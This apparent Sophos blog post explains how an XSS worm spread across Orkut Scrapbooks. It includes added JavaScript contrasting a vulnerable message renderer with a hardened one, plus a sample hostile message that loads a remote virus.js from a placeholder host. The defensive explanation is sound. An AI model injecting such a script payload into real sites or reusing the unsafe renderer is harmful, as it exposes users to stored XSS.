Large scale Orkut virus outbreak not cool

Although most virus attacks these days are financially motivated, old-style attacks whose only aim is to make the attacker look cool and famous still exist.

The most recent example is yesterday’s large scale worm attack on Google’s social networking site Orkut. In an attack reminiscent of some earlier attacks on social networking sites such as MySpace, the author of the worm allegedly wanted to raise awareness about a security flaw in Orkut’s URL parsing. The flaw allowed the attacker to launch a cross-site scripting attack (XSS attack) and execute arbitrary code inside the Orkut environment.

This was a classic XSS attack. The attacker initially created a bogus user and ran code that found that user’s friends and embedded a piece of code into their Scrapbooks (essentially a page where other users can leave messages for the Scrapbook’s owner). Orkut notifies the user about the new message, and when the user visited their Scrapbook the XSS attack was executed: a malicious JavaScript file, virus.js, was retrieved from a remote site (the page has since been taken offline) and run. The worm uses AJAX to retrieve the list of the infected user’s friends and embed the new message in their Scrapbooks. This style of spreading grows as a geometric progression (the same as the email worms of the past), which explains how the threat infected so many user profiles so quickly.
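As an added illustration of the defence against this class of flaw (example code, not Orkut’s code and not from the original post): a Scrapbook message rendered unsafely beside a hardened version that entity-encodes the text and allows only absolute http(s) links. The message shape, function names and sample values are assumptions.

```javascript
// Added example, not Orkut's code. Assumes a Scrapbook message shaped as
// { text: string, link: string|null } (hypothetical).

// Entity-encode the five HTML-significant characters so untrusted text
// can never be interpreted as markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// Accept only absolute http(s) URLs; reject javascript:, data: and anything
// the URL parser cannot handle. Returns the normalised URL or null.
function safeHttpUrl(raw) {
  let u;
  try { u = new URL(String(raw).trim()); } catch { return null; }
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  return u.href;
}

// Vulnerable rendering: untrusted text and link are dropped straight into
// markup, so a message carrying a <script> tag executes in the viewer's page.
function renderScrapUnsafe(msg) {
  return `<div class="scrap"><a href="${msg.link}">${msg.text}</a></div>`;
}

// Hardened rendering: text is entity-encoded, the link is scheme-checked and
// encoded, and a rejected link is simply dropped rather than rendered.
function renderScrapSafe(msg) {
  const text = escapeHtml(msg.text);
  const link = safeHttpUrl(msg.link);
  if (link === null) return `<div class="scrap">${text}</div>`;
  return `<div class="scrap"><a href="${escapeHtml(link)}">${text}</a></div>`;
}

// Constructed sample of the kind of message a stored-XSS worm relies on
// (the host name is a placeholder, not the real distribution site).
const hostileScrap = {
  text: '<script src="http://example.invalid/virus.js"></script>',
  link: "javascript:void(0)",
};
```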

One of the worm’s payloads adds the infected user profile to the member list of the “Infectados pelo Virus do Orkut” (Infected by Orkut Virus) community, which allowed the author to track the number of infected profiles. When last checked there were more than 670,000 members of the community.

Orkut virus community

Regardless of what the author thought about this worm, the fact is that infecting hundreds of thousands of user profiles is not cool and clearly not the way to disclose a vulnerability. The attack shows once again that users should be very careful about posting sensitive information to their profiles (even their limited profiles) on popular social networking sites such as Orkut, Facebook and MySpace. Previously, Sophos conducted research and issued best practice guidelines on using Facebook and restricting the information users post to their profiles. The guidelines can easily be applied to any social networking site.

Sophos will be detecting the malicious JavaScript component used by the worm as JS/Adrecl-A.